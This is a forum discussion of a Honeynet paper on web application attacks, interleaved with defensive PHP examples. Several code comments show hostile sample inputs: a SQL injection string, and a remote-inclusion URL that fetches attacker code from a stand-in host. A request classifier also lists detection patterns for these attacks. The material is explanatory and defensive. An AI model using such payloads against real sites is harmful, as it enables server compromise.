Honeynet Delineates Web Application Threats

An anonymous reader sends us to a technical white paper written by the Honeynet Project & Research Alliance: Know Your Enemy: Web Application Threats. Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers. Included are code injection, remote code-inclusion, SQL injection, cross-site scripting, and exploitation of the PHPShell application.
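For readers who haven't run into the attack classes listed above, cross-site scripting is the quickest one to show in code. The sketch below is illustrative only and is not taken from the paper; the page name and parameter are invented.

    <?php
    // search.php -- hypothetical page, not from the paper or any real site.
    // Vulnerable: the query parameter is reflected straight into the HTML, so a
    // crafted link like  search.php?q=<script>...</script>  runs in the visitor's browser.
    $q = isset($_GET['q']) ? $_GET['q'] : '';
    // echo "You searched for: " . $q;                       // the dangerous version

    // Safer: encode HTML metacharacters before output.
    echo "You searched for: " . htmlspecialchars($q, ENT_QUOTES, 'UTF-8');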

  • Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers.

    chroot and run it as nobody?
    Install mod_security?
    • Re: (Score:3, Informative)

      Well, don't use "nobody", use a non-shared account with a name like "www". And chroot won't help you with a SQL injection attack, especially if the scripts log in as "sa" (don't laugh, I've seen it done).

      If it's the apps being attacked and not the server, the first line of defense is to sanitize user input (see the sketch after this thread).
    • SELinux is probably a better idea than chroot.
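
    Picking up the thread's point about sanitizing user input: bound parameters go one step further and keep the input out of the SQL text entirely. Below is a rough sketch using PDO; the database, table, and account names are invented, and the connection deliberately uses a low-privilege account rather than sa or root.

        <?php
        // Hypothetical lookup -- database, table, and column names are invented.
        $db = new PDO('mysql:host=localhost;dbname=app', 'www_app', 'secret');
        $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

        // Vulnerable: a value like  ' OR '1'='1  rewrites the query.
        // $rows = $db->query("SELECT id FROM users WHERE name = '{$_POST['user']}'");

        // Safer: a prepared statement treats the value as data, never as SQL.
        $stmt = $db->prepare('SELECT id FROM users WHERE name = :name');
        $stmt->execute([':name' => $_POST['user']]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
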
  • Based on the descriptions of the attacks in the article, it looks like your general attacker is some kiddie who wields Google like a broadsword. Sure, there were some attempts to recruit the honeypot into a botnet or set up a phishing site, but most of the attacks just overwrote the index page (with text from a tutorial, no less) or moved around in the file system. I didn't know the ratio of kiddies to people who know what they're doing was so out of whack.
  • Patch! Patch! Patch! (Score:4, Informative)

    by gbulmash ( 688770 ) <semi_famousNO@SPAMyahoo.com> on Sunday February 25, 2007 @11:49PM (#18149140) Homepage Journal
    The basic theme of this seems to be "patch! patch! patch!". A lot of the scripts they discussed (AWStats, phpBB, etc.) are ones where the people who use them don't have the expertise to dig into their code and fix problems themselves (or possibly even understand what the problems are).

    The three rules of running a web app you didn't write:
    • 1: Subscribe to the announcements mailing list
    • 2: Apply patches immediately
    • 3: Back up your shit regularly, because even if you do 1 and 2, you might get hit, and then you're going to need your backups (a rough backup sketch follows this comment).
    Rule three is sort of universal for any webmaster, whatever they're running, even if they wrote it all themselves and have security certifications up the wazoo. Not running backups is about as wise as putting your 401k funds into lottery tickets.

    - Greg
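
    On rule three: for a small site, a cron-driven dump of the database plus a tarball of the web root is usually enough. The sketch below is only an outline; every path, database name, and filename is a placeholder, and the credentials are assumed to live in a .my.cnf outside the web root.

        <?php
        // backup.php -- rough sketch; run nightly from cron, e.g.:
        //   0 3 * * * php /home/site/backup.php
        $stamp = date('Ymd');
        $dest  = '/home/site/backups';

        // Dump the database; credentials come from a .my.cnf outside the web root.
        exec("mysqldump --defaults-extra-file=/home/site/.my.cnf appdb | gzip > $dest/db-$stamp.sql.gz", $out, $dbStatus);

        // Archive the document root alongside it.
        exec("tar czf $dest/www-$stamp.tar.gz /var/www/html", $out, $tarStatus);

        exit(($dbStatus === 0 && $tarStatus === 0) ? 0 : 1);
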
  • Related work (Score:5, Interesting)

    by Beryllium Sphere(tm) ( 193358 ) on Sunday February 25, 2007 @11:54PM (#18149158) Journal
    It's a good article for people who aren't focusing on security professionally. It shouldn't be news to anybody who keeps up with trends, though -- is anyone really still using register_globals?!

    Michal Zalewski pointed out a cute hack some years ago. Search engine spiders have to follow links that end in queries, like "toparticle.php?page=1". Barring extraordinary and ultimately impossible care in the coding of the spiders, they could also follow URLs that include attack code after the question mark. In _Silence on the Wire_, he imagined a crook building a long list of links to potentially vulnerable systems, appending attack code to each, and leaving the list someplace where Googlebot and its colleagues will find it. Googlebot could twist the doorknob on 1.5 million phpBB systems a lot faster than the crook possibly could.
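
    To make the mechanics concrete: a script that hands a query parameter to include() can be exploited by nothing more than a crafted link, which is exactly what a spider will follow. The sketch below is invented for illustration; the file and parameter names are not from the book or the paper.

        <?php
        // toparticle.php -- invented example of the URL style mentioned above.
        // Vulnerable (with allow_url_include on): a crawler-followed link like
        //   toparticle.php?page=http://evil.example/shell.txt
        // pulls attacker code onto the server and executes it.
        // include($_GET['page']);                             // the dangerous version

        // Safer: map the parameter onto a fixed whitelist of local templates.
        $pages = array('1' => 'article1.php', '2' => 'article2.php');
        $key   = isset($_GET['page']) ? $_GET['page'] : '1';
        include __DIR__ . '/templates/' . (isset($pages[$key]) ? $pages[$key] : $pages['1']);
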
  • by mrkitty ( 584915 ) on Monday February 26, 2007 @02:21AM (#18149912) Homepage
    From the Web Application Security Consortium: "From a counter-intelligence perspective, standard honeypot/honeynet technologies have not borne much fruit in the way of web attack data. Web-based honeypots have not been as successful as OS-level or other honeypot applications (such as SMTP) due to the lack of their perceived value. Deploying an attractive honeypot web site is a complicated, time-consuming task. Other than a script kiddie probing for an easy defacement or an indiscriminate worm, you just won't get much traffic. So the question is - how can we increase our traffic, and thus our chances of obtaining valuable web attack reconnaissance? This project will use one of the web attacker's most trusted tools against him - the open proxy server. Instead of being the target of the attacks, we opt to be used as a conduit of the attack data in order to gather our intelligence. By deploying multiple, specially configured open proxy servers (or proxypots), we aim to take a bird's-eye look at the types of malicious traffic that traverse these systems. The honeypot systems will conduct real-time analysis on the HTTP traffic to categorize the requests into threat classifications outlined by the Web Security Threat Classification and report all logging data to a centralized location." http://www.webappsec.org/projects/honeypots/
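
    The "real-time analysis" step described above can be approximated in a few lines. The sketch below is not the WASC code, and the signature patterns are illustrative rather than anything like a complete rule set.

        <?php
        // Rough sketch: classify a request URI against a few attack signatures.
        function classify_request($uri) {
            $signatures = array(
                'sql-injection'        => '/union\s+select|\bor\s+1\s*=\s*1\b/i',
                'remote-inclusion'     => '/=\s*(https?|ftp):\/\//i',
                'cross-site-scripting' => '/<script|javascript:/i',
                'directory-traversal'  => '/\.\.\//',
            );
            $hits = array();
            foreach ($signatures as $label => $pattern) {
                if (preg_match($pattern, $uri)) {
                    $hits[] = $label;
                }
            }
            return $hits;
        }

        // Example: a request line a proxypot might see.
        $uri = '/forum/viewtopic.php?page=http://evil.example/shell.txt';
        foreach (classify_request($uri) as $label) {
            error_log(date('c') . "  $label  $uri");
        }
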
  • Compromised server (Score:5, Informative)

    by tttonyyy ( 726776 ) on Monday February 26, 2007 @05:11AM (#18150792) Homepage Journal
    Unfortunately I know about this all too well, the hard way.

    Take your eye off the ball and lose your server, it's as simple as that.

    If you have a server with a lot of PHP applications running, you need to watch them all. I forgot about a CMS installation on my server that was being preserved for historical reasons (not even linked from the front page, but obviously visible to Google), and sure enough, it got exploited via a remote-inclusion attack and was used for nefarious purposes for a while without my noticing.

    Checking the logs, the definite path of attack was a Google search for a known vulnerable version of the CMS, followed by a perl script to perform the hack. Clearly the vulnerable system went into a shared database of known vulnerable systems, because to this day, despite the CMS having been backed up and taken offline, my server gets attacked about once every 20 minutes by perl scripts targeting that CMS.

    I also regularly see bots automatically filling in registration forms with spam, and wikis getting referrer comments added to them, or even having their content changed by bots.

    Looking after even a smallish webserver has proven to be a royal pain in the proverbial.

    Regarding PHPShell, I'd hope most people hash the password in the config file rather than leaving it in plain text (a rough sketch of the idea follows this comment), and also hide the installation away somewhere non-obvious (maybe behind another layer of protection to keep the web crawlers from spotting it). But even with hashed passwords, logging in still sends a plaintext password, and is thus just as vulnerable to good old FTP- and telnet-style password sniffing. The Joomla extension that provides a plugin PHPShell is a worrying development, and I'm sure it will lead to more PHPShell discoveries on servers.

    Really, the only way to avoid being compromised if you have a semi-busy site is to learn how to compromise websites yourself and try it on your own site (it also teaches you what to look out for in the logs). This, in combination with regular patching, seems to be the best way to stay one step ahead.

    And yes, keeping the evidence is good - it gets stupid kids kicked off their ISPs when you send them the proof. ;) Now *that* is some satisfying karma. :)
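
    On the PHPShell password point above: the idea is that the config stores only a digest of the password, never the password itself, so a leaked config file gives less away, although (as noted) the password still crosses the wire in the clear unless the login page sits behind HTTPS. The sketch below is not PHPShell's actual code; the file name and layout are invented.

        <?php
        // Rough sketch of hashed-password checking -- not PHPShell's real code.
        // The stored value is a digest only, generated once with something like:
        //   php -r "echo hash('sha256', 'the-real-password'), PHP_EOL;"
        session_start();

        // Assumption: the digest lives in a file outside the document root.
        $stored_hash = trim(file_get_contents('/home/site/secrets/shell-password.hash'));

        $supplied = isset($_POST['password']) ? $_POST['password'] : '';
        if (hash('sha256', $supplied) === $stored_hash) {
            // Authenticated -- but $supplied still travelled in plaintext unless
            // the page was served over HTTPS.
            $_SESSION['authenticated'] = true;
        } else {
            header('HTTP/1.1 403 Forbidden');
            exit('forbidden');
        }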
